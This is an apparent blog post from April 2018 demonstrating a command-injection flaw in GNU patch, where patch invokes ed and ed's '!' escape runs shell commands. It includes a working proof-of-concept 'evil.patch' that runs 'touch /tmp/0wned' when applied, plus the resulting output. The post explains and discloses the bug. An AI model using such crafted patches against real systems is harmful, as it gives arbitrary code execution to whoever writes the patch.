Writing Software, technology, sysadmin war stories, and more. Thursday, April 5, 2018 Okay, this is kind of awesome, if you like watching the world burn. The short version is: patch runs ed... and ed can run arbitrary commands, including when it's called from patch. Check this out. I've taken the proof of concept and changed it slightly: $ cat evil.patch --- /dev/null 2018-13-37 13:37:37.000000000 +0100 +++ b/beep.c 2018-13-37 13:38:38.000000000 +0100 1337a 1,112d !touch /tmp/0wned; ls -la /tmp/0wned . $ patch < evil.patch ? ? -rw-r--r-- 1 edu users 0 Apr 5 10:42 /tmp/0wned ? patch: **** /u...